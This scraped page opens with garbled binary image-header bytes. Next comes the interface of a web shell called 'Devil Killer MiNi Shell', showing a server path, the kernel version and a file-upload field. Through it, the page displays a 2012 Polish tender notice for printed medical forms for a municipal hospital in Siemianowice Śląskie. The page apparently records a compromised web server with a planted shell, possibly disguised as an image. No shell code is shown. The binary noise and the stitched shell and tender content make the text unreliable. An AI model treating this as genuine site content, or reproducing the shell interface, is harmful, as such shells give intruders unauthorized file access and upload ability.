JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120626/219660-N-2012.html

<p class="kh_header"><b>Siemianowice Śląskie: Wykonywanie dla potrzeb Szpitala Miejskiego w Siemianowicach Śląskich dostaw  druków medycznych i niemedycznych.</b><br>
<b>Numer ogłoszenia: 219660 - 2012; data zamieszczenia: 26.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Miejski w Siemianowicach Śląskich , ul. 1-go Maja 9, 41-100 Siemianowice Śląskie, woj. śląskie, tel. 032 2281930, faks 032 2281498.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsiemianowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie dla potrzeb Szpitala Miejskiego w Siemianowicach Śląskich dostaw  druków medycznych i niemedycznych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa druków medycznych i niemedycznych zgodnych z załącznikiem nr 1 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0, 22.45.80.00-5, 22.90.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opis sposobu dokonywania oceny spełniania tego warunku: Wykonawca musi legitymować się wykonaniem w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 zamówień odpowiadających przedmiotowi niniejszego  postępowania swoim rodzajem i co najmniej przybliżoną kwotą, jednak nie niższą niż 12 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	dokumenty wymienione w punkcie IX,
b)	prawidłowo wypełniony formularz ofertowy z wykorzystaniem wzoru - załącznik nr 2 do SIWZ;
c)	zaakceptowane i podpisane warunki projektu umowy - załącznik nr 4 do SIWZ;
d)	oświadczenie o zapoznaniu się z warunkami postępowania  - załącznik nr 5 do SIWZ;
e)	wypełniony formularz cenowy - załącznik nr 7 do SIWZ;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Dostawcy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego, a także dotyczą: 
1.	zmiany ilości zamawianego asortymentu przy zachowaniu cen jednostkowych zgodnych z ofertą Dostawcy,
2.	obniżenia cen w stosunku do cen ofertowych przez Dostawcę, 
3.	zmiany numeru katalogowego produktu lub jego nazwy przy zachowaniu tożsamości dostarczanego produktu i jego cech jakościowych nie gorszych niż produkt zaoferowany w ofercie,
4.	zmiany danych Stron umowy (np. zmiana siedziby, adresu, nazwy),
5.	działania siły wyższej lub wystąpienia stanu wyższej konieczności,
6.	zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe,
7.	zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
8.	omyłek pisarskich lub błędów rachunkowych,
9.	mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między Stronami,
10.	jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsiemianowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpitalu Miejskim w Siemianowicach Śląskich
ul. 1-go Maja 9; 41-100 Siemianowice Śląskie
Dział Zamówień Publicznych i Zaopatrzenia 
pokój -116.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2012 godzina 09:30, miejsce: Szpitalu Miejskim w Siemianowicach Śląskich
ul. 1-go Maja 9; 41-100 Siemianowice Śląskie
Dział Zamówień Publicznych i Zaopatrzenia 
pokój -116.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Druki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ANKIETA UDAROWA
ANKIETA OAiIT informacja o znieczuleniu
BADANIE ULTRASONOKARDIOGRFICZNE
BILANS PLYNOW
DANE PACJENTA DO ZWOLNIENIA LEKARSKIEGO
DOBOWA KARTA KWALIFIKACJI DO ZYWIENIA POZAJELIT LUB DOJELIT
DOBOWA KARTA ZLECEN LEKARSKICH OAiIT
DOKUMENTACJA PIELEGNIAREK DOT PACJENTA Z ODLEZYNA
HISTORIA CHOROBY DLA ODDZIAŁU - KLINIKI CHOROB KOBIECYCH
HISTORIA CHOROBY OGOLNA ODDZIAL REHABILITACJI
HISTORIA CHOROBY OGOLNA
HISTORIA CHOROBY PORADNIA ZDROWIA PSYCHICZNEGO
HISTORIA PIELEGNOWANIA
HISTORIA POBYTU NOWORODKA
HISTORIA ROZWOJU NOWORODKA
HISTORIA ZDROWIA I CHOROBY
INDYWIDUALNA KARTA ZLECEN LEKARSKICH
INDYWIDUALNA KARTA ZLECEN LEKARSKICH DIAGNOSTYKA I KONSULTACJE
INFORMACJA DLA LEKARZA KIERUJACEGO
INFORMACJA DLA PACJENTA RTG PRZYGOTOWANIE DO BADAN RTG
INFORMACJA DLA PACJENTA ZGODA ENDOSKOPOWA POLIPEKTOMIA
INFORMACJA DLA PACJENTA ZGODA KOLONOSKOPIA
INFORMACJA DLA PACJENTA ZGODA NA WYKONANIE OPERACJI - ZABIEGU INTERWENCYJNEGO
INFORMACJA DLA PACJENTA ZGODA NA WYKONANIE RTG Z JODEM
INFORMACJA DLA PACJENTA ZGODA PANENDOSKOPIA
INFORMACJA DLA PACJENTKI ZGODA NA CESARSKIE CIECIE
INFORMACJA O KOSZTACH LECZENIA PACJENTA
KARTA CHOREGO NA CUKRZYCE PRZYCHODNIA
KARTA CZYNNOSCI PIELEGNIARSKICH ODDZIAL NEONATOL.
KARTA DEPOZYTOWA
KARTA DOKUMENTACJI POSTEPOWANIA PRZECIWBOLOWEGO
KARTA EWIDENCJI PACJENTA PORADNI PSYCHIATRYCZNEJ
KARTA GORACZKOWA OGÓLNA
KARTA INDYWIDULANEJ OPIEKI PIELĘGNIARSKIEJ
KARTA INDYWIDUALNEJ PIELEGNACJI CHOREJ GINEKOLOGICZNIE
KARTA INDYWIDULANEJ PIELEGNACJI OAiIT
KARTA INDYWIDUALNEJ PIELEGNACJI POLOZNICY
KARTA INFORMACYJNA KONSULTACJI SZPITALNEJ centralna izba przyjęć
KARTA KONTROLI TETNA PLODU
KARTA LECZENIA KOREKCYJNO - KOMPENSACYJNEGO
KARTA OBSERWACJI CENTRALNEGO DOSTEPU ZYLNEGO - TETNICZEGO
KARTA OBSERWACJI CIEZARNEJ
KARTA OBSERWACJI PORODU
KARTA OBSERWACYJNA
KARTA OCENY STANU PACJENTA TISS-28 i NEMS
KARTA PIELEGNACJI PACJENTA W CENTRALNEJ IZBIE PRZYJEC
KARTA POLOZNICZA
KARTA POMIAROWA UKLADU RUCHU WG METODY ODNIESIENIA DO POZYCJI 0 WRAZ Z KARTA REHABILITACYJNA
KARTA PRZETOCZEN
KARTA PUNKTACJI PACJENTA W SKALI TISS 28
KARTA R - BILANS OGÓLNY
KARTA REHABILITACYJNA
KARTA REJESTRACJI ODLEZYN
KARTA STATYSTYCZNA SZPITALNA OGÓLNA
KARTA STATYSTYCZNA ZGONU
KARTA UODPORNIENIA
KARTA ZABIEGOW REHABILITACJA
KARTA ZGLOSZENIA EKSPOZYCJI
KARTA ZGLOSZENIA NOWOTWORU ZLOSLIWEGO
KARTA ZYWIENIA POZAJELITOWEGO- KARTA METABOLICZNA OAIIT
KONTROLA STEZENIA GLUKOZY
KWALIFIKACJA ANESTEZJOLOGICZNA DO ZABIEGU OPERACYJNEGO
KWIT DEPOZYTOWY
LISTA KONTROLNA STANOWISKA ZNIECZULENIA
LISTA PACJENTOW BADANIA ENDOSKOPOWE
OCENA RYZYKA WYSTAPIENIA ODLEZYN wg SKALI NORTON
OCENA RYZYKA ZWIAZANEGO ZE STANEM ODZYWIENIA
OCENA ZAKRESU RUCHU KK GORNYCH DOLNYCH ODCINKA SZYJNEGO WRAZ Z KARTA REHABILITACYJNA
ODPIS DANYCH EUROPEJSKA KARTA EKUZ
OGOLNOPOLSKI REJ PL-ACS
OKOŁOOPERACYJNA KARTA KONTROLNA
OSWIADCZENIE PACJENTA BRAK DOKUMENTU BRAK UBEZPIECZENIA
OSWIADCZENIE PACJENTA DEPOZYT
OSWIADCZENIE PACJENTA ODMOWA HOSPITALIZACJI - WYPIS NA ŻĄDANIE
OSWIADCZENIE PACJENTA OPASKI BRAK ZGODY
OSWIADCZENIE PACJENTA OPASKI ZGODA
OSWIADCZENIE PACJENTA POKRYCIE KOSZTOW TRANSPORTU
OSWIADCZENIE PACJENTA PRAWA PACJENTA
OSWIADCZENIE PACJENTA UPOWAZNIENIE DO WGLADU W DOKUMENTACJE MEDYCZNA
OSWIADCZENIE PACJENTA WYCHODZENIE POZA ODDZIAL
OSWIADCZENIE PLODY 1 ZEZWOLENIE  NA WYKONANIE BADANIA HISTOPATOLOGICZNEGO
OSWIADCZENIE PLODY 2 OSWIADCZENIE RODZINY W PRZEDMIOCIE POCHOWKU - kremacja
OSWIADCZENIE PLODY 3 UPOWAŻNIENIE DO PODPISYWANIA OŚWIADCZEŃ W IMIENIU MATKI DZIECKA
OSWIADCZENIE PLODY 4 BRAK PLCI
OSWIADCZENIE PRZECHOWYWANIE ZWLOK W CHLODNI 72h
PISEMNE ZGLOSZENIE URODZENIA DZIECKA
PROCEDURY MEDYCZNE OAiIT
PROCEDURY MEDYCZNE PRACOWNIA ENDOSKOPOWA ośrodek kosztów
PROCEDURY MEDYCZNE REHABILTACJA reh ośrodek kosztów
PROCEDURY MEDYCZNE REHABILTACJA reh
PROTOKOL POSTEPOWANIA RESUSCYTACYJNEGO
PROTOKOL ZGLOSZENIA REKLAMACJI KRWI I JEJ SKLADNIKOW
PROTOKOL ZNIECZULENIA
PRZEPUSTKA DLA ODWIEDZAJACYCH
PRZEPUSTKA DLA PACJENTA - UDZIELENIE ZGODY NA TYMCZASOWE OPUSZCZENIE ODDZIAŁU
RAPORT DZIENNY ILOSC PACJENTOW ODDZIALY
SKIEROWANIE BADANIA RTG USG
SKIEROWANIE BADANIA TK RM HELIMED
SKIEROWANIE BADANIA TOKSYKOLOGICZNE
SKIEROWANIE BADANIE KWALIFIKACYJNE DO PODANIA IMMUNOGLOBULINY
SKIEROWANIE DO PORADNI SPECJALISTYCZNEJ
SKIEROWANIE DO PRACOWNI ENDOSKOPOWEJ
SKIEROWANIE DO PRACOWNI MIKROSKOPOWEJ DIAGNO MED
SKIEROWANIE DO PRACOWNI MIKROSKOPOWEJ WYKONANIE BACC
SKIEROWANIE DO PRACOWNI SEROLOGICZNEJ NA WYKONANIE BADANIA GRUPY KRWI
SKIEROWANIE DO PRACOWNI SEROLOGICZNEJ NA WYKONANIE PROBY ZGODNOSCI
SKIEROWANIE DO RCKiK NA KONSULTACYJNE BADANIA SEROLOGICZNE
SKIEROWANIE DO RCKiK NA WYKONANIE PROBY ZGODNOSCI
SKIEROWANIE DO SZPITALA 
SKIEROWANIE NA KONSULTACJE
SKIEROWANIE NA KREW DO PILNEJ TRANSFUZJI
SKIEROWANIE NA LECZENIE UZDROWISKOWE
SKIEROWANIE NA WYKONANIE BADANIA ODCZYN COOMBSA
SKIEROWANIE NA WYKONANIE SEKCJI ZWLOK
SKIEROWANIE NA ZABIEGI FIZJOTERAPEUTYCZNE
SKIEROWANIE ZWLOK DO CHLODNI
SPRAWOZDANIE OPERACYJNE
SUBIEKTYWNA GLOBALNA OCENA STANU ODZYWIANIA
TERMINARZYK
UPOWAZNIENIE DO UDOSTEPNIANIA DOKUM MED
WKLADKA DO HISTORII CHOROBY - GINEKOLOGICZNA
WKLADKA DO HISTORII CHOROBY - PRZYCHODNIA
WNIOSEK O UDOSTEPNIENIE DOKUMENTACJI MEDYCZNEJ
WNIOSEK O WYDANIE ORYGINAŁU DOKUMENTACJI MEDYCZNEJ
WNIOSEK O ZANIECHANIE SEKCJI ZWŁOK
WYWIAD DLA PACJENTA PIERWSZORAZOWEGO ENDOKRYNOLOG
WYWIAD EPIDEMIOLOGICZNY
ZAMOWIENIE IMIENNE IMMUNOGLOBULINA
ZAMOWIENIE NA KREW I JEJ SKLADNIKI
ZAPOTRZEBOWANIE NA SRODKI ODURZAJACE
ZAPOTRZEBOWANIE NA SZCZEPIONKI
ZASWIADCZENIE DLA UCZNIA
ZASWIADCZENIE LEKARSKIE
ZASWIADCZENIE O POBYCIE W SZPITALU
ZASWIADCZENIE O ZDOLNOSCI DO PRACY
ZAWIADOMIENIE O ZASTOSOWANIU PRZYMUSU BEZPOŚREDNIEGO
ZESTAWIENIE DZIENNE ODDZIAŁU RUCH CHORYCH I LOZKA
ZLECENIE NA TRANSPORT SANITARNY
ZLECENIE NA WYKONANIE NAPRAWY PRZEDMIOTU ORTOPEDYCZNEGO
ZLECENIE NA ZAOPATRZENIE W WYROBY MEDYCZNE
ZMODYFIKOWANA SKALA RANKINA
BADANIE KONTROLNE
BADANIE SKUTECZNOSCI STERYLIZACJI
DEZYNFEKCJA W WANIENKACH DEZYNFEKCYJNYCH STREFA BRUDNA
DZIENNIK DESTYLACJI WODY
DZIENNIK PRACY URZADZENIA DEZYNFEKCJA 3
DZIENNIK PRACY URZADZENIA STERYLIZACJA 1
DZIENNIK PRACY URZADZENIA STERYLIZACJA 2
ETYKIETA BLOK OPERACYJNY
ETYKIETA ODDZIAL
ETYKIETA PORADNIA
KARTA PRACY RO sterylizacja
POMIAR TEMPERATURY I WILGOTNOŚCI
PROTOKOL NIEZGODNOSCI DOSTARCZENIA SPRZETU MYJNIA PAKOWALNIA A5
PROTOKOL ZDAWCZO ODBIORCZY oddział pojedyn narzędzia
PROTOKOL ZDAWCZO ODBIORCZY oddział zestawy
PROTOKOL ZDAWCZO-ODBIORCZY sterylizacja
PUNKTACJA DEZYNFEKCJI 
PUNKTACJA EO
RESTERYLIZACJA
STACJA UZDATNIANIA WODY ZUZYCIE WODY
STANOWISKO INKUBACJI TESTOW BIOLOGICZNYCH sterylizacja
STATYSTYKA ILOSC PAKIETOW
TEST NIHYDRYNOWY DO WYKYWANIA BIALEK 
TRANSPORT sterylizacja
ZAWIADOMIENIE O ROZPOCZECIU  STERYLIZ GAZOWEJ
ZESTAWIENIE OKRESOWYCH CZYNNOSCI SERWISOWYCH 
INDYWIDUALNA KARTA REJESTRACJI DROBNOUSTROJU ALARMOWEGO
KARTA REJESTRACYJNA ZAKAZENIA SZPITALNEGO
SYSTEM CZYNNEJ REJESTRACJI ZAKAZEN raport dorosli
SYSTEM CZYNNEJ REJESTRACJI ZAKAZEN zabiegi procedury
DOWOD WYDANIA Z MAGAZYNU
KONTROLA TEMPERATURY W LODOWCE
ODPIS WYNIKU BADANIA GRUPY KRWI
PROTOKOL BADANIA SEROLOGICZNEGO
WYNIK BADAN CIAL ODPORNOSCIOWYCH
WYNIK BADANIA GRUPY KRWI
WYNIK PROBY ZGODNOSCI
KSIAZKA BADANIA GRUP KRWI DLA LABORATORIOW (z RCKiK)
KSIAZKA DO BADANIA PRZECIWCIAL
KSIAZKA DOKONANYCH OPERACJI
KSIAZKA KONTROLI SRODKOW UDERZAJACYCH I PSYCHOTROPOWYCH - KSIAZKA NARKOTYCZNA
KSIAZKA OBROTU KRWIA DLA SZPITALI  (z RCKIK)
KSIAZKA PROB ZGODNOSCI (z RCKiK)
KSIAZKA PRZETOCZENIOWA
KSIEGA AMBULATORYJNA - 2 POZYCYJNA
KSIEGA AMBULATORYJNA - 5 POZYCYJNA
KSIEGA CHORYCH ODDZIAŁU
KSIEGA GLOWNA CHORYCH
KSIEGA OCZEKUJACYCH NA PRZYJECIE DO SZPITALA
KSIEGA OCZEKUJACYCH PACJENTOW NA UDZIELENIE SWIADCZEN PRZYCHODNIA
KSIEGA ODDZIALOWA ODDZIALU NEONATOLOGICZNEGO
KSIEGA PORODOW
KSIEGA PRZYJEC I ODMOW
KSIEGA PRZYJEC ODDZIALU GINEKOLOGICZNO-POLOZNICZEGO
KSIEGA PRZYJEC PRZYCHODNI
KSIEGA RAPORTOW LEKARSKICH
KSIEGA RAPORTOW PIELEGNIARSKICH
KSIEGA RTG
KSIEGA USG
KSIEGA ZABIEGOW NP. ODDZIAŁU 
KSIEGA ZABIEGOW PRZYCHODNIA
REJESTR MIKROBIOLOGIA KORLAB
REJESTR ODPISY GRUPY KRWI
REJESTR POBRAN KRWI PEPOWINOWEJ
REJESTR WYDAWANIA KLUCZY PROSEKTORIUM
REJESTR WYDAWANIA ZWLOK Z ODDZIALOW
REJESTR ZDARZEN NIEPOZADANYCH I ISTOTNYCH
ZESZYT BADAN HISTOPATOLOGICZNYCH
KSIAZKA KONTROLI PRZEDSIEBIORCY
POCZTOWA KSIAZKA NADAWCZA
REJESTR FAKTUR
REJESTR KORESPONDENCJI PRZYCHODZACEJ
REJESTR KORESPONDENCJI WEWN
REJESTR KORESPONDENCJI WYCHODZACEJ
ZAKLADOWA KSIEGA ZALECEN I UWAG ZAKLADOWEGO SPOLECZNEGO INSPEKTORA PRACY
DELEGACJA
KARTA OBIEGOWA KADRY
KARTA OCENY PRACOWNIKA (roczna 4.1.)
KARTA ROZLICZENIOWA ZA DYZURY
KARTOTEKA ZAROBKOWO-PODATKOWA ZA ROK 20
KWESTIONARIUSZ OSOBOWY DLA PRACOWNIKA
KWESTIONARIUSZ OSOBY UBIEGAJACEJ SIE O ZATRUDNIENIE
LISTA OBECNOSCI
PLAN URLOPOW WYPOCZYNKOWYCH
ROCZNA KARTA EWIDENCJI CZASU PRACY (2013-2014)
ROZKLAD CZASU PRACY PERSONELU - KARTA ROZLICZENIOWA
ROZKLAD PRACY DLA PIELEGNIAREK
WNIOSEK O URLOP WYPOCZNKOWY
WNIOSEK O WOLNE ZA NADGODZINY
WNIOSEK O WYRAZENIE ZGODY NA WYJSCIE PRYWATNE - SLUZBOWE
ZLECENIE WYKONANIA PRACY W GODZINACH NADLICZBOWYCH
ARKUSZ SPISU Z NATURY
KP
ETYKIETA PRZYCHODNI SPECJALITYCZNEJ - Godziny przyjec PK
FIRMÓWKA SZPITALA A4
FIRMÓWKA SZPITALA A5
KARTA DROGOWA
OCHRONA WYDANIE ZDANIE KLUCZA
WZOR OPISU KOPERTY Z DOKUMENTACJA MEDYCZNA
ZAPOTRZEBOWANIE 
ZESTAW CWICZEN DLA DZIECI Z PLASKOSTOPIEM.</p></li>
